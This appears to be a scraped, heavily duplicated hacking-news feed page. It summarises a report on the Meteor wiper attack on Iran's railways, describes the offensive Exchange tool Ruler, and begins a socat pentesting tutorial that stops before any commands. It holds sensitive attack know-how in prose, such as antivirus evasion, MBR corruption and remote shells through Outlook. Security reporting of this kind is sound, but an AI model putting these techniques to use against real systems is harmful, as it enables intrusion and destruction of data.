Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Reconmap : VAPT (Vulnerability Assessment And Penetration Testing) Automation And Reporting Platform
Reconmap is a vulnerability assessment and penetration testing (VAPT) platform. It helps software engineers and infosec pros collaborate on security projects, from planning, to implementation and documentation. The tool’s aim is to go from recon to report in the least possible time. Requirements Docker Docker compose Documentation Go to https://reconmap.org to find the user, admin and developer […]
The post Reconmap : VAPT (Vulnerability Assessment And Penetration Testing) Automation And Reporting Platform appeared first on Kali Linux Tutorials.
Reconmap : VAPT (Vulnerability Assessment And Penetration Testing) Automation And Reporting Platform
Reconmap is a vulnerability assessment and penetration testing (VAPT) platform. It helps software engineers and infosec pros collaborate on security projects, from planning, to implementation and documentation. The tool’s aim is to go from recon to report in the least possible time. Requirements Docker Docker compose Documentation Go to https://reconmap.org to find the user, admin and developer […]
The post Reconmap : VAPT (Vulnerability Assessment And Penetration Testing) Automation And Reporting Platform appeared first on Kali Linux Tutorials.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part One: Surviving Physical + Virtual Vegas
https://cdn-images-1.medium.com/max/1814/1*GiZNtOCjOrUkzNfaZlQu0w.jpeg
Welcome to the DCG 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker…
Continue reading on Medium »
HYBRID HACKER SUMMER CAMP 2021 GUIDE — Part One: Surviving Physical + Virtual Vegas
https://cdn-images-1.medium.com/max/1814/1*GiZNtOCjOrUkzNfaZlQu0w.jpeg
Welcome to the DCG 201 guide to Hybrid Hacker Summer Camp! This is part of a series where we are going to cover all the various hacker…
Continue reading on Medium »
Attack AI systems in Machine Learning Evasion Competition | Microsoft Security Blog
https://www.reddit.com/r/redteamsec/comments/ouh05g/attack_ai_systems_in_machine_learning_evasion/
submitted by /u/AdmiralDoughnot (https://www.reddit.com/user/AdmiralDoughnot)
[link] (https://www.microsoft.com/security/blog/2021/07/29/attack-ai-systems-in-machine-learning-evasion-competition/) [comments] (https://www.reddit.com/r/redteamsec/comments/ouh05g/attack_ai_systems_in_machine_learning_evasion/)
https://www.reddit.com/r/redteamsec/comments/ouh05g/attack_ai_systems_in_machine_learning_evasion/
submitted by /u/AdmiralDoughnot (https://www.reddit.com/user/AdmiralDoughnot)
[link] (https://www.microsoft.com/security/blog/2021/07/29/attack-ai-systems-in-machine-learning-evasion-competition/) [comments] (https://www.reddit.com/r/redteamsec/comments/ouh05g/attack_ai_systems_in_machine_learning_evasion/)
Deep Web
What is Multisig?
I'm a noob lol. I've got to add a bitcoin public key to my account to make an order. What is a bitcoin public key? And additional information is greatly appreciated lol
submitted by /u/Phragram
[link] [comments]
What is Multisig?
I'm a noob lol. I've got to add a bitcoin public key to my account to make an order. What is a bitcoin public key? And additional information is greatly appreciated lol
submitted by /u/Phragram
[link] [comments]
reddit
What is Multisig?
I'm a noob lol. I've got to add a bitcoin public key to my account to make an order. What is a bitcoin public key? And additional information is...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Hackers used never-before-seen wiper in recent attack on Iranian train system
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Hackers used never-before-seen wiper in recent attack on Iranian train systemPost Views: 90
Reading Time: 2 Minutes
Researchers with cybersecurity company SentinelOne reconstructed the recent cyberattack on Iran’s train system in a new report, uncovering a new threat actor — which they named ‘MeteorExpress’ — and a never-before-seen wiper.
On July 9, local news outlets began reporting on a cyberattack targeting the Iranian train system, with hackers defacing display screens in train stations by asking passengers to call ‘64411’, the phone number of Iranian Supreme Leader Khamenei’s office.
Train services were disrupted and just one day later, hackers took down the website of Iran’s transport ministry. According to Reuters, the ministry’s portal and sub-portal sites went down after the attack targeted computers at the Ministry of Roads and Urban Development.
In his examination, SentinelOne principal threat analyst Juan Andres Guerrero-Saade explained that the people behind the attack called the never-before-seen wiper ‘Meteor’ and developed it in the last three years.
“At this time, we have not been able to tie this activity to a previously identified threat group nor to additional attacks,” Guerrero-Saade said, adding that they were able to reconstruct the attack thanks to security researcher Anton Cherepanov and an Iranian antivirus company.
“Despite a lack of specific indicators of compromise, we were able to recover most of the attack components described in the post along with additional components they had missed. Behind this outlandish tale of stopped trains and glib trolls, we found the fingerprints of an unfamiliar attacker.”
Guerrero-Saade said the early analysis of Padvish security researchers was key to SentinelOne’s reconstruction alongside “a recovered attacker artifact that included a longer list of component names.”
See Also: Microsoft: New Unpatched Bug in Windows Print Spooler
“The attackers abused Group Policy to distribute a cab file to conduct their attack. The overall toolkit consists of a combination of batch files orchestrating different components dropped from RAR archives,” Guerrero-Saade explained.
“The archives decompressed with an attacker-supplied copy of Rar.exe coupled with the password ‘hackemall’. The wiper components are split by functionality: Meteor encrypts the filesystem based on an encrypted configuration, nti.exe corrupts the MBR, and mssetup.exe locks the system.”
SentinelOne found that the majority of the attack was “orchestrated via a set of batch files nested alongside their respective components and chained together in successive execution.”
The batch file copies the initial components via a CAB file in a network share within the Iranian railways network, according to the report. From there, the batch file uses its own copy of WinRAR to decompress additional components from three additional archives that use a Pokemon-themed password, “hackemall” which was also referenced elsewhere during the attack.
“At this point, the execution begins to bifurcate into other scripts. The first one is ‘cache.bat’, which focuses on clearing obstacles and preparing the ground for subsequent elements with the use of Powershell,” Guerrero-Saade said.
“‘cache.bat’ performs three main functions. First, it will disconnect the infected device from the network. Then it checks to see if Kaspersky antivirus is installed on the machine, in which case it’ll exit. Finally, ‘cache.bat’ will[...]
Hackers used never-before-seen wiper in recent attack on Iranian train system
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Hackers used never-before-seen wiper in recent attack on Iranian train systemPost Views: 90
Reading Time: 2 Minutes
Researchers with cybersecurity company SentinelOne reconstructed the recent cyberattack on Iran’s train system in a new report, uncovering a new threat actor — which they named ‘MeteorExpress’ — and a never-before-seen wiper.
On July 9, local news outlets began reporting on a cyberattack targeting the Iranian train system, with hackers defacing display screens in train stations by asking passengers to call ‘64411’, the phone number of Iranian Supreme Leader Khamenei’s office.
Train services were disrupted and just one day later, hackers took down the website of Iran’s transport ministry. According to Reuters, the ministry’s portal and sub-portal sites went down after the attack targeted computers at the Ministry of Roads and Urban Development.
In his examination, SentinelOne principal threat analyst Juan Andres Guerrero-Saade explained that the people behind the attack called the never-before-seen wiper ‘Meteor’ and developed it in the last three years.
“At this time, we have not been able to tie this activity to a previously identified threat group nor to additional attacks,” Guerrero-Saade said, adding that they were able to reconstruct the attack thanks to security researcher Anton Cherepanov and an Iranian antivirus company.
“Despite a lack of specific indicators of compromise, we were able to recover most of the attack components described in the post along with additional components they had missed. Behind this outlandish tale of stopped trains and glib trolls, we found the fingerprints of an unfamiliar attacker.”
Guerrero-Saade said the early analysis of Padvish security researchers was key to SentinelOne’s reconstruction alongside “a recovered attacker artifact that included a longer list of component names.”
See Also: Microsoft: New Unpatched Bug in Windows Print Spooler
“The attackers abused Group Policy to distribute a cab file to conduct their attack. The overall toolkit consists of a combination of batch files orchestrating different components dropped from RAR archives,” Guerrero-Saade explained.
“The archives decompressed with an attacker-supplied copy of Rar.exe coupled with the password ‘hackemall’. The wiper components are split by functionality: Meteor encrypts the filesystem based on an encrypted configuration, nti.exe corrupts the MBR, and mssetup.exe locks the system.”
SentinelOne found that the majority of the attack was “orchestrated via a set of batch files nested alongside their respective components and chained together in successive execution.”
The batch file copies the initial components via a CAB file in a network share within the Iranian railways network, according to the report. From there, the batch file uses its own copy of WinRAR to decompress additional components from three additional archives that use a Pokemon-themed password, “hackemall” which was also referenced elsewhere during the attack.
“At this point, the execution begins to bifurcate into other scripts. The first one is ‘cache.bat’, which focuses on clearing obstacles and preparing the ground for subsequent elements with the use of Powershell,” Guerrero-Saade said.
“‘cache.bat’ performs three main functions. First, it will disconnect the infected device from the network. Then it checks to see if Kaspersky antivirus is installed on the machine, in which case it’ll exit. Finally, ‘cache.bat’ will[...]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Black Hat Ethical Hacking
Offensive Security Tool: Ruler
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Offensive Security Tool: RulerPost Views: 24 https://www.blackhatethicalhacking.com/wp-content/uploads/2020/11/BECOME-A-PATRON-AND-UNLOCK-EXCLUSIVE-VIDEOS-8-1-300x120.png Support our work or become a Patron and find exclusive video content available ONLY on Patreon showing you continuous techniques and methodologies in Offensive Security.
Reading Time: 3 Minutes
Offensive Security Tool: Ruler GitHub Link IntroductionRuler by sensepost, is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim is abuse the client-side Outlook features and gain a shell remotely. This tool will help you even with Office 365 / Exchange setups, to check how secure your policies are, as it goes beyond than enumeration, but also gets you a access on that system with a shell which can be converted to a more powerful escalated shell such as meterpreter shell.
The full low-down on how Ruler was implemented and some background regarding MAPI can be found in their blog posts:
* Ruler release
* Pass the Hash with Ruler
* Outlook forms and shells
* Outlook Home Page – Another Ruler Vector
For a demo of it in action: Ruler on YouTube
See Also: Offensive Security Tool: VoIPmonitor Sniffer What does it do?Ruler has multiple functions and more are planned. These include
* Enumerate valid users
* Create new malicious mail rules
* Dump the Global Address List (GAL)
* VBScript execution through forms
* VBScript execution through the Outlook Home Page
Ruler attempts to be semi-smart when it comes to interacting with Exchange and uses the Autodiscover service (just as your Outlook client would) to discover the relevant information.
See Also: Reboot of PunkSpider Tool at DEF CON Stirs Debate Getting StartedCompiled binaries for Linux, OSX and Windows are available. Find these in Releases information about setting up Ruler from source is found in the getting-started guide. UsageRuler has multiple functions, these have their own documentation that can be found in the wiki:
* BruteForce — discover valid user accounts.
* Rules — perform the traditional, rule based attack.
* Forms — execute VBScript through forms.
* Homepage — use the Outlook ‘home page’ for shell and persistence.
* GAL — grab the Global Address List. Attacking ExchangeThe library included with Ruler allows for the creation of custom message using MAPI. This along with the Exchange documentation is a great starting point for new research. For an example of using this library in another project, see SensePost Liniaal.
See Also: Penetration Testing alone cannot identify the maximum number of vulnerabilities in an application. Recent Tools* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/VoIPsniffer-90x90.png Offensive Security Tool: VoIPmonitor Sniffer7 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/57177630ce750eb1ad40649424d04b9c-90x90.jpeg Offensive Security Tool: Veil2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Untitled-design-90x90.png Offensive Security Tool: It Was All A Dream (Windows Print Spooler RCE)3 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/unknown-e1625210118591-90x90.png Offensive Security Tool: GoSpider4 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/3Gn0bEI-e1624621931936-90x90.png Offensive Security Tool: Pixload1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Vqwdgis-90x90.png Offensive Security Tool: SecretFinder1 month [...]
Offensive Security Tool: Ruler
https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Offensive Security Tool: RulerPost Views: 24 https://www.blackhatethicalhacking.com/wp-content/uploads/2020/11/BECOME-A-PATRON-AND-UNLOCK-EXCLUSIVE-VIDEOS-8-1-300x120.png Support our work or become a Patron and find exclusive video content available ONLY on Patreon showing you continuous techniques and methodologies in Offensive Security.
Reading Time: 3 Minutes
Offensive Security Tool: Ruler GitHub Link IntroductionRuler by sensepost, is a tool that allows you to interact with Exchange servers remotely, through either the MAPI/HTTP or RPC/HTTP protocol. The main aim is abuse the client-side Outlook features and gain a shell remotely. This tool will help you even with Office 365 / Exchange setups, to check how secure your policies are, as it goes beyond than enumeration, but also gets you a access on that system with a shell which can be converted to a more powerful escalated shell such as meterpreter shell.
The full low-down on how Ruler was implemented and some background regarding MAPI can be found in their blog posts:
* Ruler release
* Pass the Hash with Ruler
* Outlook forms and shells
* Outlook Home Page – Another Ruler Vector
For a demo of it in action: Ruler on YouTube
See Also: Offensive Security Tool: VoIPmonitor Sniffer What does it do?Ruler has multiple functions and more are planned. These include
* Enumerate valid users
* Create new malicious mail rules
* Dump the Global Address List (GAL)
* VBScript execution through forms
* VBScript execution through the Outlook Home Page
Ruler attempts to be semi-smart when it comes to interacting with Exchange and uses the Autodiscover service (just as your Outlook client would) to discover the relevant information.
See Also: Reboot of PunkSpider Tool at DEF CON Stirs Debate Getting StartedCompiled binaries for Linux, OSX and Windows are available. Find these in Releases information about setting up Ruler from source is found in the getting-started guide. UsageRuler has multiple functions, these have their own documentation that can be found in the wiki:
* BruteForce — discover valid user accounts.
* Rules — perform the traditional, rule based attack.
* Forms — execute VBScript through forms.
* Homepage — use the Outlook ‘home page’ for shell and persistence.
* GAL — grab the Global Address List. Attacking ExchangeThe library included with Ruler allows for the creation of custom message using MAPI. This along with the Exchange documentation is a great starting point for new research. For an example of using this library in another project, see SensePost Liniaal.
See Also: Penetration Testing alone cannot identify the maximum number of vulnerabilities in an application. Recent Tools* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/VoIPsniffer-90x90.png Offensive Security Tool: VoIPmonitor Sniffer7 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/57177630ce750eb1ad40649424d04b9c-90x90.jpeg Offensive Security Tool: Veil2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Untitled-design-90x90.png Offensive Security Tool: It Was All A Dream (Windows Print Spooler RCE)3 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/unknown-e1625210118591-90x90.png Offensive Security Tool: GoSpider4 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/3Gn0bEI-e1624621931936-90x90.png Offensive Security Tool: Pixload1 month ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Vqwdgis-90x90.png Offensive Security Tool: SecretFinder1 month [...]
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Hackers used never-before-seen wiper in recent attack on Iranian train system https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Hackers used never-before-seen wiper in recent attack…
create Windows Defender exclusions for all of its components, effectively clearing the way for a successful infection without impediments.” See Also: Offensive Security Tool: VoIPmonitor Sniffer The report explained that this specific script was instructive in rebuilding the attack chain because it includes a list of the attack components that gave researchers specific things to search for.
Two batch files are deployed that make the machine unbootable and clean up the event logs. After a number of other actions, update.bat will then call ‘msrun.bat,’ which passes “the Meteor wiper executable as a parameter.”
Another batch file — msrun.bat — moves in a screen locker and the encrypted configuration for the Meteor wiper, Guerrero-Saade explained. A scheduled task is created by the script called ‘mstask’ that is then set to execute the Meteor wiper at five minutes to midnight.
“There’s a strange level of fragmentation to the overall toolkit. Batch files spawn other batch files, different rar archives contain intermingled executables, and even the intended action is separated into three payloads: Meteor wipes the filesystem, mssetup.exe locks the user out, and nti.exe presumably corrupts the MBR,” Guerrero-Saade wrote.
“The main payload of this convoluted attack chain is an executable dropped under ‘env.exe’ or ‘msapp.exe’. Internally, the coders refer to it as ‘Meteor’. While this particular instance of Meteor suffers from a crippling OPSEC failure (the inclusion of verbose debug strings presumably intended for internal testing), it’s an externally configurable wiper with an extensive set of features.”
The Meteor wiper, according to the report, is supplied with a single argument, an encrypted JSON configuration file ‘msconf.conf.’
Meteor wipes files as it moves from the encrypted config deletes shadow copies and takes a machine out of a domain to complicate remediation. These only scratched the surface of what Meteor is capable of, according to the report. See Also: Hacking Stories: Andrian Lamo – The ‘homeless’ Hacker Although not used in the attack on the Iranian train station, the wiper is able to change passwords for all users, disable screensavers, process termination based on a list of target processes, install a screen locker, disable recovery mode, change boot policy error handling, create schedule tasks, log off local sessions, delete shadow copies, change lock screen images and execute demands.
Guerrero-Saade noted that the developers of the wiper created multiple ways for the wiper to accomplish each of these tasks
“However, the operators clearly made a major mistake in compiling a binary with a wealth of debug strings meant for internal testing. The latter is an indication that despite whatever advanced practices the developers have in their arsenal, they lack a robust deployment pipeline that ensures such mistakes do not happen. Moreover, note that this sample was compiled six months before its deployment and the mistake was not caught,” the report found.
“Secondly, the code is a bizarre amalgam of custom code that wraps open-source components (cpp-httplib v0.2) and practically ancient abused software (FSProLabs’ Lock My PC 4). While that might suggest that the Meteor wiper was built to be disposable, or meant for a single operation, that’s juxtaposed with an externally configurable design that allows efficient reuse for different operations.”
When SentinelOne researchers did a deeper dive into Meteor, they found that the redundancies were evidence that the wiper was created by multiple developers who added different components.
The report added that the “externally configurable nature of the wiper” shows that it wasn’t created for this particular operation. They have yet to see any other attacks or variants of the Meteor wiper in the wild.
Researchers were not able to attribute the attack to a specific threat actor but explained that the atta[...]
Two batch files are deployed that make the machine unbootable and clean up the event logs. After a number of other actions, update.bat will then call ‘msrun.bat,’ which passes “the Meteor wiper executable as a parameter.”
Another batch file — msrun.bat — moves in a screen locker and the encrypted configuration for the Meteor wiper, Guerrero-Saade explained. A scheduled task is created by the script called ‘mstask’ that is then set to execute the Meteor wiper at five minutes to midnight.
“There’s a strange level of fragmentation to the overall toolkit. Batch files spawn other batch files, different rar archives contain intermingled executables, and even the intended action is separated into three payloads: Meteor wipes the filesystem, mssetup.exe locks the user out, and nti.exe presumably corrupts the MBR,” Guerrero-Saade wrote.
“The main payload of this convoluted attack chain is an executable dropped under ‘env.exe’ or ‘msapp.exe’. Internally, the coders refer to it as ‘Meteor’. While this particular instance of Meteor suffers from a crippling OPSEC failure (the inclusion of verbose debug strings presumably intended for internal testing), it’s an externally configurable wiper with an extensive set of features.”
The Meteor wiper, according to the report, is supplied with a single argument, an encrypted JSON configuration file ‘msconf.conf.’
Meteor wipes files as it moves from the encrypted config deletes shadow copies and takes a machine out of a domain to complicate remediation. These only scratched the surface of what Meteor is capable of, according to the report. See Also: Hacking Stories: Andrian Lamo – The ‘homeless’ Hacker Although not used in the attack on the Iranian train station, the wiper is able to change passwords for all users, disable screensavers, process termination based on a list of target processes, install a screen locker, disable recovery mode, change boot policy error handling, create schedule tasks, log off local sessions, delete shadow copies, change lock screen images and execute demands.
Guerrero-Saade noted that the developers of the wiper created multiple ways for the wiper to accomplish each of these tasks
“However, the operators clearly made a major mistake in compiling a binary with a wealth of debug strings meant for internal testing. The latter is an indication that despite whatever advanced practices the developers have in their arsenal, they lack a robust deployment pipeline that ensures such mistakes do not happen. Moreover, note that this sample was compiled six months before its deployment and the mistake was not caught,” the report found.
“Secondly, the code is a bizarre amalgam of custom code that wraps open-source components (cpp-httplib v0.2) and practically ancient abused software (FSProLabs’ Lock My PC 4). While that might suggest that the Meteor wiper was built to be disposable, or meant for a single operation, that’s juxtaposed with an externally configurable design that allows efficient reuse for different operations.”
When SentinelOne researchers did a deeper dive into Meteor, they found that the redundancies were evidence that the wiper was created by multiple developers who added different components.
The report added that the “externally configurable nature of the wiper” shows that it wasn’t created for this particular operation. They have yet to see any other attacks or variants of the Meteor wiper in the wild.
Researchers were not able to attribute the attack to a specific threat actor but explained that the atta[...]
Hacking Articles Tips Tricks Videos Tutorials
Black Hat Ethical Hacking Offensive Security Tool: Ruler https://www.blackhatethicalhacking.com/wp-content/uploads/2017/11/black-hat-locks-and-electronics.jpg Offensive Security Tool: RulerPost Views: 24 https://www.blackhatethicalhacking.com/wp-content/…
ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/3v1wot9-90x90.png Offensive Security Tool: CloudFail2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Screenshot_2021-06-04_053854-90x90.png Offensive Security Tool: Pacu – The Amazon Web Services Exploitation Framework2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Screenshot_20210527_200634-90x90.png OSINT Tool: LinkedIn Scraper2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/sna-768x373-1-90x90.png Offensive Security Tool: Snallygaster2 months ago
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6620833063853657"
data-ad-slot="4517761481">
The post Offensive Security Tool: Ruler first appeared on Black Hat Ethical Hacking.
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/3v1wot9-90x90.png Offensive Security Tool: CloudFail2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/06/Screenshot_2021-06-04_053854-90x90.png Offensive Security Tool: Pacu – The Amazon Web Services Exploitation Framework2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/Screenshot_20210527_200634-90x90.png OSINT Tool: LinkedIn Scraper2 months ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/05/sna-768x373-1-90x90.png Offensive Security Tool: Snallygaster2 months ago
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6620833063853657"
data-ad-slot="4517761481">
The post Offensive Security Tool: Ruler first appeared on Black Hat Ethical Hacking.
Hacking Articles Tips Tricks Videos Tutorials
create Windows Defender exclusions for all of its components, effectively clearing the way for a successful infection without impediments.” See Also: Offensive Security Tool: VoIPmonitor Sniffer The report explained that this specific script was instructive…
cker is an “intermediate level player whose different operational components sharply oscillate from clunky and rudimentary to slick and well-developed.”
“On the one hand, we have a new externally-configurable wiper packed full of interesting capabilities, involving a mature development process, and redundant means to accomplish their goals. Even their batch scripts include extensive error checking, a feature seldom encountered with deployment scripts. Their attack is designed to cripple the victim’s systems, leaving no recourse to simple remediation via domain administration or recovery of shadow copies,” Guerrero-Saade wrote.
“On the other hand, we see an adversary that doesn’t yet have a handle on their deployment pipeline, using a sample of their malware that contains extensive debug features and burning functionality irrelevant to this particular operation.”
Guerrero-Saade goes on to say that SentinelOne “cannot yet make out the shape of this adversary across the fog” and theorizes that it is “an unscrupulous mercenary group” or state-backed actors with a variety of motives.
Although they were unable to attribute the attack, they noted that the attackers appeared to be familiar with the general setup of Iran’s railway system and the Veeam backup used by the target, implying the threat actors spent time in the system before launching an attack.
At the time of the attack, Iranian officials did not confirm if there was a ransom demand or who they believed was behind the attack, Reuters reported. The Times of Israel noted that following the infamous Stuxnet attack in 2010, Iran disconnected significant parts of its infrastructure from the internet.
Source: www.zdnet.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/PunkSpider-90x90.png Reboot of PunkSpider Tool at DEF CON Stirs Debate1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/apple-mac-security-90x90.jpg Apple Patches Actively Exploited Zero-Day in iOS, MacOS2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Windows-Abstract-90x90.jpg Microsoft Rushes Fix for ‘PetitPotam’ Attack PoC3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Ransomware-Key-90x90.jpg Kaseya Obtains Universal Decryptor for REvil Ransomware4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Atlassian-Jira-90x90.png Critical Jira Flaw in Atlassian Could Lead to RCE1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Copy-of-Untitled-90x90.png MacOS Being Picked Apart by $49 XLoader Data Stealer1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/printer-1-90x90.jpg 16-Year-Old HP Printer-Driver Bug Impacts Millions of Windows Machines1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/p1050753-e1537277708291-90x90.jpg Leaked NSO Group Data Hints at Widespread Pegasus Spyware Infections1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Microsoft-Office-90x90.jpg Microsoft: New Unpatched Bug in Windows Print Spooler2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/linkedin_generic-90x90.jpg Safari Zero-Day Used in Malicious LinkedIn Campaign2 weeks ago
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6620833063853657"
data-ad-slot="4517761481">
The post Hackers used never-before-seen wiper in recent attack on Iranian train system first appeared on Black Hat Ethical Hacking.
“On the one hand, we have a new externally-configurable wiper packed full of interesting capabilities, involving a mature development process, and redundant means to accomplish their goals. Even their batch scripts include extensive error checking, a feature seldom encountered with deployment scripts. Their attack is designed to cripple the victim’s systems, leaving no recourse to simple remediation via domain administration or recovery of shadow copies,” Guerrero-Saade wrote.
“On the other hand, we see an adversary that doesn’t yet have a handle on their deployment pipeline, using a sample of their malware that contains extensive debug features and burning functionality irrelevant to this particular operation.”
Guerrero-Saade goes on to say that SentinelOne “cannot yet make out the shape of this adversary across the fog” and theorizes that it is “an unscrupulous mercenary group” or state-backed actors with a variety of motives.
Although they were unable to attribute the attack, they noted that the attackers appeared to be familiar with the general setup of Iran’s railway system and the Veeam backup used by the target, implying the threat actors spent time in the system before launching an attack.
At the time of the attack, Iranian officials did not confirm if there was a ransom demand or who they believed was behind the attack, Reuters reported. The Times of Israel noted that following the infamous Stuxnet attack in 2010, Iran disconnected significant parts of its infrastructure from the internet.
Source: www.zdnet.com (Click Link)Recent News* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/PunkSpider-90x90.png Reboot of PunkSpider Tool at DEF CON Stirs Debate1 day ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/apple-mac-security-90x90.jpg Apple Patches Actively Exploited Zero-Day in iOS, MacOS2 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Windows-Abstract-90x90.jpg Microsoft Rushes Fix for ‘PetitPotam’ Attack PoC3 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Ransomware-Key-90x90.jpg Kaseya Obtains Universal Decryptor for REvil Ransomware4 days ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Atlassian-Jira-90x90.png Critical Jira Flaw in Atlassian Could Lead to RCE1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Copy-of-Untitled-90x90.png MacOS Being Picked Apart by $49 XLoader Data Stealer1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/printer-1-90x90.jpg 16-Year-Old HP Printer-Driver Bug Impacts Millions of Windows Machines1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/p1050753-e1537277708291-90x90.jpg Leaked NSO Group Data Hints at Widespread Pegasus Spyware Infections1 week ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/Microsoft-Office-90x90.jpg Microsoft: New Unpatched Bug in Windows Print Spooler2 weeks ago
* https://www.blackhatethicalhacking.com/wp-content/uploads/2021/07/linkedin_generic-90x90.jpg Safari Zero-Day Used in Malicious LinkedIn Campaign2 weeks ago
style="display:block; text-align:center;"
data-ad-layout="in-article"
data-ad-format="fluid"
data-ad-client="ca-pub-6620833063853657"
data-ad-slot="4517761481">
The post Hackers used never-before-seen wiper in recent attack on Iranian train system first appeared on Black Hat Ethical Hacking.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking Articles|Raj Chandel's Blog
Socat for Pentester
Socat is one of those kinds of tools that either you might not know at all, or if you know then you might know all the different kinds of stuff that you can do with it. While working with it, we felt that there are guides for socat but none of them strike the right balance between the introduction and variety. This article will serve as the introduction if you have not heard about socat and as an advance if you already know something about it without being jarring. Table of Content<o:p· Introduction<o:po What is Socat?<o:p
o Usage of Socat<o:p
o Netcat v/s Socat<o:p
· Bind Shell<o:p· Encrypted Bind Shell<o:p· Reverse Shell<o:p· Encrypted Reverse Shell<o:p· Port Forwarding<o:p· File Transfer<o:p· Conclusion<o:pIntroduction<o:pWhat is Socat?<o:pIn a general sense, socat is a relay that can be used for data transfer in both directions between two data channels independently. These data channels can be in a form of a file, pipe, device (serial line, etc. or a pseudo-terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, proxy CONNECT connection, a file descriptor (stdin, etc.), the GNU line editor (readline), a program, or a combination of two of these. <o:p Usage of Socat<o:psocat provides a wide range of tasks that it can be used for. Let’s take an example, Socat can be used as a TCP port forwarder, as an external socksifier, for attacking weak firewalls, as a shell interface to UNIX sockets or an IP6 relay, for redirecting TCP oriented programs to a serial line, or to logically connect serial lines on different computers, as well as to establish a secure environment for running client or server shell scripts with network connections. <o:p Netcat V/s Socat<o:pWe all have been using Netcat for a long time ago. It has been the daily driver for many penetration testers since its initial development. It is praised as it is easy to use and it can write or read data over network connections using the TCP and UDP. Now, let’s talk about Socat. As we discussed earlier it is a relay that can be used bidirectionally. Some features are provided by Socat such as establishing Multiple connections, creating a secure channel, support of more protocols such as OpenSSL, SCTP, Socket, Tunnel, etc.<o:p Bind Shell<o:pIn a general sense, a bind shell opens up a port on the remote machine that is expecting and waiting for an incoming connection. Once the user connects to the listener, a shell is provided to the user to interact. <o:p
